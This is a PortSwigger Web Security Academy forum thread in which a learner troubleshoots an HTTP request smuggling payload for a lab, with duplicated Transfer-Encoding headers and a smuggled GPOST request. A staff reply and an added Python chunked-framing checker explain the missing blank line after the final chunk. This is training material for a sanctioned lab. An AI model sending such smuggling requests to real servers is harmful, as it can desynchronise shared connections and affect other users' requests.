HTTP request smuggling, obfuscating the TE header

Sondip | Last updated: Mar 05, 2021 07:22AM UTC

POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0\r\n\r\n

Response=>

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
Connection: close
Content-Length: 38

{"error":"Read timeout after 10000ms"}

Uthman, PortSwigger Agent | Last updated: Mar 05, 2021 09:54AM UTC

You need to include two newlines (press Enter/Return on your keyboard twice) after the '0'. Have you done this?
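The framing rule behind this answer, as an added example that is not part of the original thread: a chunked body is only finished once the `0` line and the empty line after it have both arrived as real CRLF bytes, and a parser that has not seen them keeps waiting, which is consistent with the read timeout above. The function name `check_chunked_body` and the sample bodies are constructed for illustration, and the parser is a strict simplification (real servers differ in what they tolerate).

```python
CRLF = b"\r\n"
HEX = b"0123456789abcdefABCDEF"

def check_chunked_body(body: bytes):
    """Classify a chunked message body as complete, incomplete or malformed."""
    pos, chunks = 0, 0
    while True:
        eol = body.find(CRLF, pos)
        if eol == -1:
            return ("incomplete", "chunk-size line is not terminated by CRLF")
        # Drop any chunk extension (";name=value") before reading the size.
        token = body[pos:eol].split(b";", 1)[0].strip()
        if not token or any(c not in HEX for c in token):
            return ("malformed", f"bad chunk size {token!r}")
        size = int(token, 16)
        pos = eol + 2
        if size == 0:
            # Last chunk: skip optional trailer lines until the empty line.
            while True:
                eol = body.find(CRLF, pos)
                if eol == -1:
                    return ("incomplete", "no empty line after the 0 chunk")
                if eol == pos:
                    return ("complete", f"{chunks} data chunk(s)")
                pos = eol + 2
        if len(body) < pos + size + 2:
            return ("incomplete", "chunk data shorter than declared size")
        if body[pos + size:pos + size + 2] != CRLF:
            return ("malformed", "chunk data not followed by CRLF")
        pos += size + 2
        chunks += 1

# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "terminated": b"3\r\nx=1\r\n0\r\n\r\n",
    "one newline after 0": b"3\r\nx=1\r\n0\r\n",
    "nothing after 0": b"3\r\nx=1\r\n0",
    "backslash text, not CRLF bytes": b"3\r\nx=1\r\n0\\r\\n\\r\\n",
    "bare LF line endings": b"3\r\nx=1\n0\n\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:32} -> {check_chunked_body(body)}")
```
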

Sondip | Last updated: Mar 05, 2021 03:13PM UTC

Can you show me?

Sondip | Last updated: Mar 05, 2021 03:32PM UTC

Thanks, man.

